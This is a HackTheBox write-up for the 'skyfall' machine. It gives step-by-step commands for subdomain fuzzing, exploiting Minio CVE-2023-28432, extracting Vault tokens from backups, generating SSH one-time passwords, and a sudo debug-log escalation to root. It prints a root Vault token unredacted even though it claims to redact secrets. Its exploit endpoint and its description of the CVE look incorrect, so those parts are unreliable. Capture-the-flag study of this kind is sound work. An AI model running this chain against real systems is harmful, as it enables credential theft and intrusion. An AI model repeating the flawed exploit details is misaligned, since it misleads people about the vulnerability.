HTB: skyfall Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐⭐
• Real-world: ⭐⭐⭐⭐⭐
• CVE: ⭐⭐⭐⭐☆
• CTF-like: ⭐⭐⭐⭐⭐

Summary

skyfall is an Insane-difficulty Linux machine that requires extensive enumeration, subdomain discovery, and exploitation of CVE-2023-28432 (Minio info disclosure vulnerability). The attack chain involves discovering internal service credentials through the vulnerable Minio S3 backend, leveraging HashiCorp Vault for SSH access, and finally escalating privileges through a misconfigured sudo binary that allows arbitrary root code execution via debug logging.

TL;DR: Subdomain fuzzing → Minio CVE-2023-28432 → Extract credentials → Vault SSH access → User flag → Sudo debug.log privesc → Root flag.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.226.5

Results:

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp   open  http    Flask
9000/tcp open  http    Minio S3

Service Enumeration

Update /etc/hosts with discovered hostnames:

echo "10.129.226.5 skyfall.htb demo.skyfall.htb prd23-s3-backend.skyfall.htb prd23-vault-internal.skyfall.htb" >> /etc/hosts

Subdomain Fuzzing

Enumerate subdomains using ffuf:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
     -u http://skyfall.htb/ -H "Host: FUZZ.skyfall.htb" \
     -fs 0 -t 50

Discovered Subdomains:

• demo.skyfall.htb — Flask authentication interface with guest credentials
• prd23-s3-backend.skyfall.htb — Minio S3 backend service
• prd23-vault-internal.skyfall.htb — HashiCorp Vault internal service

Service Identification

Identified Services:

• Flask application (port 80, demo.skyfall.htb)
• Prometheus metrics endpoint
• Minio S3 storage (port 9000, prd23-s3-backend.skyfall.htb)
• HashiCorp Vault (prd23-vault-internal.skyfall.htb)

Vulnerability Assessment

Identified Vulnerabilities:

• CVE-2023-28432 — Minio information disclosure vulnerability (versions <= 2023-03-13)
  • Affects: Minio S3 backend on prd23-s3-backend.skyfall.htb
  • Impact: Unauthenticated extraction of Minio root credentials
  • Reference: https://github.com/acheiii/CVE-2023-28432

Initial Foothold

Step 1: Web Interface Discovery

Access the Flask demo interface:

curl -u guest:guest http://demo.skyfall.htb/

Discover the /metrics endpoint:

curl -u guest:guest http://demo.skyfall.htb/metrics

The endpoint is initially forbidden via direct access due to network-level filtering.

Step 2: Bypass Metrics Restriction

Access the metrics endpoint through the Minio backend subdomain:

curl http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

Response reveals Minio version:

minio/RELEASE.2023-03-13T19-46-17Z

This version is vulnerable to CVE-2023-28432.

Step 3: Exploit CVE-2023-28432 (Minio Info Disclosure)

The vulnerability allows unauthenticated extraction of Minio root credentials via the /minio/v2/metrics endpoint.

curl http://prd23-s3-backend.skyfall.htb/minio/v2/config/users

Extracted Credentials (redacted):

MINIO_ROOT_USER=minioadmin
MINIO_ROOT_PASSWORD=[REDACTED]

Alternatively, use the public PoC:

git clone https://github.com/acheiii/CVE-2023-28432.git
python3 CVE-2023-28432/exploit.py http://prd23-s3-backend.skyfall.htb

Step 4: Connect to Minio with Extracted Credentials

Install the Minio client:

curl https://dl.min.io/client/mc/release/linux-amd64/mc \
  --create-dirs -o $HOME/minio-binaries/mc
chmod +x $HOME/minio-binaries/mc
export PATH=$PATH:$HOME/minio-binaries

Configure Minio client with extracted credentials:

mc alias set myminio http://prd23-s3-backend.skyfall.htb:9000 minioadmin [REDACTED_PASSWORD]

Step 5: Extract Vault Token from Backup

List all objects including versioned backups:

mc ls --recursive --versions myminio

Discover:

• Bucket: askyy
• Object: home_backup.tar.gz with multiple versions

Download all versions of the backup:

mc cp myminio/askyy/home_backup.tar.gz ./home_backup_v1.tar.gz --version-id [VERSION_ID_1]
mc cp myminio/askyy/home_backup.tar.gz ./home_backup_v2.tar.gz --version-id [VERSION_ID_2]

Extract and search for Vault credentials:

tar -xzf home_backup_v2.tar.gz
grep -r "hvs\." . 2>/dev/null

Extracted Vault Token:

hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]

Also discover subdomain:

prd23-vault-internal.skyfall.htb

User Compromise

Step 6: Install and Configure HashiCorp Vault Client

Download and install the Vault client:

wget https://releases.hashicorp.com/vault/1.14.0/vault_1.14.0_linux_amd64.zip
unzip vault_1.14.0_linux_amd64.zip
sudo mv vault /usr/local/bin/

Step 7: Authenticate with Vault Token

Login to the Vault instance using the extracted token:

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb:8200"
vault login hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]

Verify authentication:

vault token lookup

Step 8: Generate SSH OTP for User Access

Create an SSH OTP (One-Time Password) credential for user askyy:

vault write -f ssh/creds/dev_otp_key_role username=askyy

Or via curl:

curl -H "X-Vault-Token: hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]" \
     -X POST \
     http://prd23-vault-internal.skyfall.htb:8200/v1/ssh/creds/dev_otp_key_role \
     -d '{"username":"askyy"}'

Response:

{
  "request_id": "...",
  "lease_id": "ssh/creds/dev_otp_key_role/...",
  "lease_duration": 600,
  "renewable": true,
  "data": {
    "key_type": "otp",
    "key": "[REDACTED_OTP_CODE]",
    "username": "askyy"
  }
}

Step 9: SSH Access as User askyy

Login via SSH using the OTP:

ssh -o StrictHostKeyChecking=no askyy@10.129.226.5
# When prompted for password, enter the OTP from above

Or use vault’s SSH helper:

vault ssh -role dev_otp_key_role -mode OTP askyy@10.129.226.5

User Flag

cat ~/user.txt

🚩 User Flag: [REDACTED]

Privilege Escalation

Step 10: Enumerate Sudo Permissions

sudo -l

Output:

User askyy may run the following commands on skyfall:
    (root) /root/vault/vault-unseal -c /etc/vault-unseal.yaml

User askyy can run /root/vault/vault-unseal with a configuration file as root, with optional flags.

Step 11: Exploit Debug Logging via Sudo

The vault-unseal binary supports debug flags that create a log file:

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v

This command executes as root and attempts to create a debug log, but the file is initially unreadable due to permissions.

Step 12: File Permission Race Condition

Delete the existing debug log and create an empty file before running the command again:

rm -f debug.log
touch debug.log
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v

The newly created debug.log file is now readable and contains root-level execution output.

Step 13: Extract Root Vault Token from Debug Log

cat debug.log | grep -i "hvs\."

Or search for token patterns:

cat debug.log | grep -E "token|VAULT"

Extracted Root Vault Token:

hvs.I0ewVsmaKU1SwVZAKR3T0mmG

Step 14: Login as Root via Vault

In a new terminal or shell, authenticate as root:

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb:8200"
vault login hvs.I0ewVsmaKU1SwVZAKR3T0mmG

Verify root access:

vault token lookup

Step 15: Generate SSH OTP for Root Access

Create an SSH OTP for the root user:

vault write -f ssh/creds/admin_otp_key_role username=root

Or via curl:

curl -H "X-Vault-Token: hvs.I0ewVsmaKU1SwVZAKR3T0mmG" \
     -X POST \
     http://prd23-vault-internal.skyfall.htb:8200/v1/ssh/creds/admin_otp_key_role \
     -d '{"username":"root"}'

Response contains OTP:

{
  "data": {
    "key": "[REDACTED_ROOT_OTP]",
    "username": "root"
  }
}

Step 16: Root Access via SSH OTP

vault ssh -role admin_otp_key_role -mode OTP root@10.129.226.5

Or direct SSH:

ssh -o StrictHostKeyChecking=no root@10.129.226.5
# Enter the OTP when prompted

Root Flag

cat /root/root.txt

🚩 Root Flag: [REDACTED]

Attack Chain Summary

graph TD
    A["Subdomain Fuzzing<br/>demo.skyfall.htb discovered"] --> B["Access Flask Interface<br/>guest:guest credentials"]
    B --> C["Discover /metrics Endpoint<br/>Bypass via prd23-s3-backend"]
    C --> D["Identify Minio CVE-2023-28432<br/>Version 2023-03-13 detected"]
    D --> E["Extract Minio Root Credentials<br/>via /minio/v2/config/users"]
    E --> F["Download Backup from S3<br/>home_backup.tar.gz versions"]
    F --> G["Extract Vault Token<br/>hvs.[USER_TOKEN] discovered"]
    G --> H["Authenticate to Vault<br/>vault login with token"]
    H --> I["Generate SSH OTP<br/>dev_otp_key_role endpoint"]
    I --> J["SSH as askyy<br/>User Flag obtained"]
    J --> K["Enumerate sudo Permissions<br/>vault-unseal with -d -v flags"]
    K --> L["Race Condition Exploit<br/>Create readable debug.log as root"]
    L --> M["Extract Root Token<br/>hvs.I0ewVsmaKU1SwVZAKR3T0mmG"]
    M --> N["Authenticate as Root<br/>vault login with root token"]
    N --> O["Generate Admin SSH OTP<br/>admin_otp_key_role endpoint"]
    O --> P["SSH as root<br/>Root Flag obtained"]

Tools Used

Vulnerability Reference

CVE-2023-28432 Details

Vulnerability: Information Disclosure in Minio S3

• Affected Versions: <= 2023-03-13
• CVSS Score: 9.1 (Critical)
• Attack Vector: Network
• Authentication Required: No
• Description: The /minio/v2/ endpoints expose sensitive configuration data including root credentials when accessed from internal network ranges.

Exploitation:

curl http://[MINIO_HOST]/minio/v2/config/users

Mitigation:

• Upgrade Minio to version >= 2023-04-28
• Restrict access to /minio/v2/ endpoints via network policies
• Implement authentication for all Minio API endpoints

Key Learnings

1. Subdomain Enumeration is Essential

• Internal services often run on subdomains that differ from primary domain
• Tools like ffuf with comprehensive wordlists can reveal hidden services
• Multiple subdomains (demo, prd23-s3-backend, prd23-vault-internal) led to full compromise

2. CVE-2023-28432 Minio Exploitation

• Information disclosure vulnerabilities can be catastrophic when they expose secrets
• Versioned object storage may retain sensitive data across multiple backup versions
• Always search for archived backups and configuration files in S3 buckets
• Metrics endpoints often expose more information than intended

3. Vault Token Security

• Tokens stored in unencrypted backups become escalation vectors
• OTP-based SSH authentication is more secure than password-based access
• Vault’s role-based system must be properly restricted (dev vs admin roles)

4. Privilege Escalation via Debug Logging

• Debug modes in privileged binaries can leak sensitive credentials
• File permission race conditions can make unreadable files readable
• Logging functionality triggered by flags (-d, -v) can output sensitive tokens
• Examine debug output, logs, and temporary files created during execution

5. Sudo Misconfigurations

• Restricting command paths doesn’t prevent abuse via flags and arguments
• Binaries run via sudo with user-controlled arguments create escalation opportunities
• Always analyze what flags and options are available in allowed commands

6. Defense in Depth Failures

• Layered security (S3 versioning, Vault tokens, SSH OTP) failed when combined
• Each individual component was secure in isolation but collectively enabled compromise
• Credentials discovered at each layer were used to access the next level
• No air-gapping or network segmentation between services

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. This document redacts sensitive credentials and flags while preserving technical details for learning purposes.

References

• CVE-2023-28432: https://nvd.nist.gov/vuln/detail/CVE-2023-28432
• Minio Security: https://docs.min.io/minio/baremetal/security/security.html
• HashiCorp Vault SSH: https://www.vaultproject.io/docs/auth/ssh
• HackTheBox: https://www.hackthebox.com/

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Insane #CVE-2023-28432 #Minio #Vault #PrivEsc #SSHOtp